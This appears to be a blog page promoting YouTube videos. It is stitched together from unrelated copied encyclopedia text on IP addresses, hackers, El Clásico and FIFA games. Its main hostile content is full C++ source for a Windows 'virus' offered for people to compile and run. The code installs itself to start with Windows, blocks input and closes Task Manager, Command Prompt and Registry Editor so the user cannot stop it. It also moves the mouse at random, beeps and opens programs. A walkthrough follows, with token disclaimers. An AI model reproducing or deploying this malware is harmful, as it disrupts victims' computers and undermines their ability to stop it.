Watch my youtube video for hacking websites. It is very easy and simple.
What is Ip address?
An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer) participating in a computer network that uses the Internet Protocol for communication.An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."
The designers of the Internet Protocol defined an IP address as a 32-bit number and this system, known as Internet Protocol Version 4 (IPv4), is still in use today. However, because of the growth of the Internet and the predicted depletion of available addresses, a new version of IP (IPv6), using 128 bits for the address, was developed in 1995. IPv6 was standardized as RFC 2460 in 1998,and its deployment has been ongoing since the mid-2000s.
IP addresses are usually written and displayed in human-readable notations, such as 172.16.254.1 (IPv4), and 2001:db8:0:1234:0:567:8:1 (IPv6).
This video is only for Educational purpose only iam not responsible for how you take this knowledge.Hacking is serious crime.Do not get into troubles.
Code iam used here netstat -a netstat -nbt
Please share,Like,comment and watch
Hacker
In computing, a hacker is any highly skilled computer expert capable of breaking into computer systems and networks using bugs and exploits. Depending on the field of computing it has slightly different meanings, and in some contexts has controversial moral and ethical connotations. In its original sense, the term refers to a person in any one of the communities and hacker subcultures
Security hacker
A security hacker is someone who seeks to breach defenses and exploit weaknesses in a computer system or network. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, recreation, or to evaluate system weaknesses to assist in formulating defenses against potential hackers. The subculture that has evolved around hackers is often referred to as the computer underground.
There is a longstanding controversy about the term's true meaning. In this controversy, the term hacker is reclaimed by computer programmers who argue that it refers simply to someone with an advanced understanding of computers and computer networks, and that cracker is the more appropriate term for those who break into computers, whether computer criminal (black hats) or computer security expert (white hats). A 2014 article concluded that "... the black-hat meaning still prevails among the general public"
Watch my you tube Video of Barcelona Vs Real Madrid.
Like,comment and share.
El Clasico
El Clásico (Spanish pronunciation: [el ˈklasiko]; Catalan: El Clàssic,[1] pronounced: [əɫ ˈkɫasik]; "The Classic") is the name given in football to any match between fierce rivals Real Madrid and FC Barcelona. Originally it referred only to those competitions held in the Spanish championship, but nowadays the term has been generalized, and tends to include every single match between the two clubs: UEFA Champions League, Copa del Rey, etc. Other than the UEFA Champions League Final, it is considered one of the biggest club football games in the world, and is among the most viewed annual sporting events. It has always been a heated match, from both sides.[5]
The rivalry comes about as Madrid and Barcelona are the two largest cities in Spain, and they are sometimes identified with opposing political positions, with Real Madrid viewed as representing Spanish nationalism and Barcelona viewed as representing Catalan nationalism.[6] The rivalry is regarded as one of the biggest in world sport. The two clubs are among the richest and most successful football clubs in the world; in 2014 Forbes ranked them the world's two most valuable sports teams.[3] Both clubs have a global fanbase; they are the world's two most followed sports teams on social media.[10][11]
Real Madrid leads the head to head results in competitive matches with 93 wins to Barcelona's 90, while Barcelona leads in total matches with 109 wins to Real Madrid's 97. Along with Athletic Bilbao, they are the only clubs in La Liga to have never been relegated.
Fifa Video Games Series
FIFA, also known as FIFA Football or FIFA Soccer, is a series of association footballvideo games or football simulator, released annually by Electronic Arts under the EA Sports label. While there was no major competition when EA released the first titles in their Madden NFL and NHL series, football video games such as Sensible Soccer, Kick Off and Match Day had been developed since the late 1980s and already competitive in the games market when EA Sports announced a football game as the next addition to their EA Sports label.
As of FIFA 17, Marco Reus is the face of the franchise, appearing on the front cover of the series and in promotional campaigns and advertisements. He replaced Lionel Messi, who appeared on four straight covers from FIFA 13 to FIFA 16.
As of 2011, the FIFA franchise has been localised into 18 languages and available in 51 countries. The series has sold more than 100 million copies worldwide, making it the best-selling sports video game franchise in the world, and one of the best-selling video game franchises. Also, FIFA 12 holds the record for the "fastest selling sports game ever" with over 3.2 million games sold and over $186 million generated at retail in its first week of release.
The franchise's latest release is FIFA 17, released on September 27, 2016 in North America, and on September 29, 2016 in the rest of world. It is available for multiple gaming systems, including the PlayStation 4 and Xbox One, among others.
Here iam today is giving a basic virus code that created in C++.Please the Code Down Is not to be used For any Wrong Purpose You are Yourself Responsible for, and Consequence That May Follow by the unauthorized use. Virus Making is a crime and i don't take any Clam over the Code it is not written by me, so if you do not know anything about programing language don't try this code. .Use wisely, stay away from troubles #include #include #include #include #include #include using namespace std; int random, Freq, Dur, X, Y; HWND mywindow, TaskMgr, CMD, Regedit; char Notepad[MAX_PATH]="notepad.exe"; char MineSweeper[MAX_PATH]="winmine.exe"; char Hearts[MAX_PATH]="mshearts.exe"; char Website[MAX_PATH]="http:\\www.google.com"; void SetUp(); void Run( int ID ); void Beeper(), OpenStuff(), Hibernation(), CrazyMouse(); DWORD WINAPI DestroyWindows(LPVOID); int main() { srand( time(0) ); random = rand()%6; system("title :.Virus.:"); BlockInput( true ); SetUp(); BlockInput( false ); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1) { Run( random ); Sleep(10); } } void SetUp() { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,"\\winminer.exe"); CopyFile(pathtofile,system,false); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system)); RegCloseKey(hKey); mywindow = FindWindow(NULL,":.Virus.:"); cout<<"You Are Doomed cyberot"; Sleep(1000); ShowWindow(mywindow, false); } void Run( int ID ) { if( ID == 1 ) { BlockInput(true); } else if( ID == 2 ) { Beeper(); } else if( ID == 3 ) { OpenStuff(); } else if( ID == 4 ) { Hibernation(); } else if( ID == 5 ) { CrazyMouse(); } else { BlockInput(true); Beeper(); OpenStuff(); CrazyMouse(); } } void Beeper() { Freq = rand()%2001; Dur = rand()%301; Beep( Freq, Dur ); } void OpenStuff() { ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE); ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE); } void Hibernation() { Sleep(1000); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); } void CrazyMouse() { X = rand()%801; Y = rand()%601; SetCursorPos( X, Y ); } DWORD WINAPI DestroyWindows(LPVOID) { while(1) { TaskMgr = FindWindow(NULL,"Windows Task Manager"); CMD = FindWindow(NULL, "Command Prompt"); Regedit = FindWindow(NULL,"Registry Editor"); if( TaskMgr != NULL ) { SetWindowText( TaskMgr, "You Suck Balls Superman"); PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( CMD != NULL ) { SetWindowText( CMD, "You Suck Balls Superman"); PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Regedit != NULL ) { SetWindowText( Regedit, "You Suck Balls Superman"); PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0); } Sleep(10); } } This is Not A proper Virus But it is An Annoying One. Still I'll Explain the Working the blank include lines are #include <iostream> #include <stdio.h> #include <windows.h> #include <winable.h> #include <conio.h> #include <ctime> Turn off the monitor void Hibernation() { Sleep(1000); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); } making your mouse go crazy. Make two rand var's and tell the mouse to goto them void CrazyMouse() { X = rand()%801; Y = rand()%601; SetCursorPos( X, Y ); } open random Apps as it says OpenStuff void OpenStuff() { ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE); ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE); ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE); ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE); } Find windows by name and destroy them ... Using the FindWindow command lets use do it and if its not null and it found the window open give it a command. DWORD WINAPI DestroyWindows(LPVOID) { while(1) { TaskMgr = FindWindow(NULL,"Windows Task Manager"); CMD = FindWindow(NULL, "Command Prompt"); Regedit = FindWindow(NULL,"Registry Editor"); if( TaskMgr != NULL ) { SetWindowText( TaskMgr, "You Suck Balls Superman"); PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( CMD != NULL ) { SetWindowText( CMD, "You Suck Balls Superman"); PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Regedit != NULL ) { SetWindowText( Regedit, "You Suck Balls Superman"); PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0); } Add your program to run when windows starts HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system)); RegCloseKey(hKey); Make your comp beep different freq and different lengths again by rand numbers void Beeper() { Freq = rand()%2001; Dur = rand()%301; Beep( Freq, Dur ); } Enjoy Compile Run. Have Fun..! Thank you
For more information watch my you tube video---->> VIDEO